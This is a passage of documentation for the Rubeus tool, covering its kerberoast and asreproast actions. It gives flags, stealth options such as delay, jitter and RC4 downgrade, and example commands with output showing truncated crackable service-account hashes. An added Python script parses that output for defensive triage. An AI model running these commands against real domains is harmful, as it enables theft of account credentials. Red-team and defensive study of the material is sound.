With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /stats flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
If the /simple flag is specified, roasted hashes will be output to the console, one per line.
If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.
If a TGT is supplied with /ticket:X (the base64 encoding of a .kirbi file, or the path to a .kirbi file on disk), that TGT is used to request the service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file containing one SPN per line or a comma-separated list), no LDAP searching for users happens, so roasting can be done from a non-domain-joined system in conjunction with /dc:Z.
If the /tgtdeleg flag is supplied, the tgtdeleg trick is used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.
If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.
If the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.
If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.
If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 argument can be combined with it to add a percentage jitter to the delay.
If the /enterprise flag is used, the SPN is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when Kerberoasting with a TGT.
If the /autoenterprise flag is used and roasting an SPN fails (due to an invalid or duplicate SPN), Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied, as Rubeus needs to know the target account's sAMAccountName, which it gets when querying LDAP for the account information.
kerberoasting opsec
Here is a table comparing the behavior of various flags from an opsec perspective:
Examples
Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:
Perform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:
C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned
[*] Total kerberoastable users : 3
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName : testspn/server
[*] PwdLastSet : 5/31/2008 12:00:02 AM
[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...
[*] SamAccountName : constraineduser
[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123
[*] PwdLastSet : 9/5/2009 7:48:50 PM
[*] Supported ETypes : RC4_HMAC
[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...
[*] SamAccountName : newuser
[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName : blah/blah123456
[*] PwdLastSet : 9/12/2008 8:05:16 PM
[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...
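As an added example (not part of Rubeus), a small Python triage script for output of the kind shown above: it splits each $krb5tgs$ hash into etype, user, realm and SPN, then flags accounts that received an RC4 (etype 23) ticket although they support AES (the tgtdeleg downgrade described in the flag list, which a monitoring rule can key on) and accounts that still support only RC4 and should have AES enabled. The sample lines are constructed from the truncated hashes above, and the field layout of the AES (etype 17/18) hash is an assumption.

```python
import re

# Constructed sample shaped like the kerberoast output above (truncated hashes, one AES account added).
SAMPLE_OUTPUT = """\
[*] SamAccountName : harmj0y
[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC
[*] SamAccountName : constraineduser
[*] Supported ETypes : RC4_HMAC
[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12
[*] SamAccountName : aesuser
[*] Supported ETypes : AES256_CTS_HMAC_SHA1_96
[*] Hash : $krb5tgs$18$aesuser$theshire.local$*http/web*$AB12CD34
"""
AES_NAMES = {"AES128_CTS_HMAC_SHA1_96", "AES256_CTS_HMAC_SHA1_96"}
FIELD_RE = re.compile(r"^\[\*\]\s+(SamAccountName|Supported ETypes|Hash)\s+:\s+(.*)$")
def parse_hash(hash_line):
    """Split $krb5tgs$<etype>$<user>$<realm>$<spn>$<cipher...> into labelled fields. RC4
    hashes carry the fields as *user$realm$spn*; the AES layout is assumed to star only
    the SPN, so '*' is stripped from the ends of every field either way."""
    parts = hash_line.strip().split("$")
    if len(parts) < 7 or parts[1] != "krb5tgs":
        raise ValueError("not a krb5tgs hash")
    return {"etype": int(parts[2]), "user": parts[3].strip("*"),
            "realm": parts[4].strip("*"), "spn": parts[5].strip("*")}
def parse_rubeus_output(text):
    """Group the '[*] Field : value' lines into one record per SamAccountName."""
    records, current = [], None
    for m in filter(None, map(FIELD_RE.match, text.splitlines())):
        key, value = m.groups()
        if key == "SamAccountName":
            current = {"sam": value.strip(), "supported": set(), "hash": None}
            records.append(current)
        elif key == "Supported ETypes" and current:
            current["supported"] = {e.strip() for e in value.split(",")}
        elif key == "Hash" and current:
            current["hash"] = parse_hash(value)
    return records
def triage(records):
    """Per account: an RC4 (etype 23) ticket issued to an AES-capable account is the
    downgrade a monitoring rule can key on; an RC4-only account should have AES enabled."""
    findings = {}
    for r in records:
        notes = []
        if r["hash"] and r["hash"]["etype"] == 23 and r["supported"] & AES_NAMES:
            notes.append("rc4_ticket_for_aes_account")
        if r["supported"] and not r["supported"] & AES_NAMES:
            notes.append("rc4_only_account")
        findings[r["sam"]] = notes
    return findings
```

Run `triage(parse_rubeus_output(SAMPLE_OUTPUT))` to get a per-account finding list; feed it real kerberoast output saved from a test run to audit which service accounts still need AES enabled.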
List statistics about found Kerberoastable accounts without actually sending ticket requests:
"Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:
C:\Rubeus>Rubeus.exe kerberoast /rc4opsec
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.6
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Found 6 users to Kerberoast!
[*] SamAccountName : harmj0y
[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName : asdf/asdfasdf
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...
asreproast
The asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For more technical information, see this post.
Just as with the kerberoast command, if no other arguments are supplied, all user accounts that do not require Kerberos preauthentication are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.
The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.
Also, if you want to use alternate domain credentials for roasting, they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.
The output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option for the new hashcat mode 18200.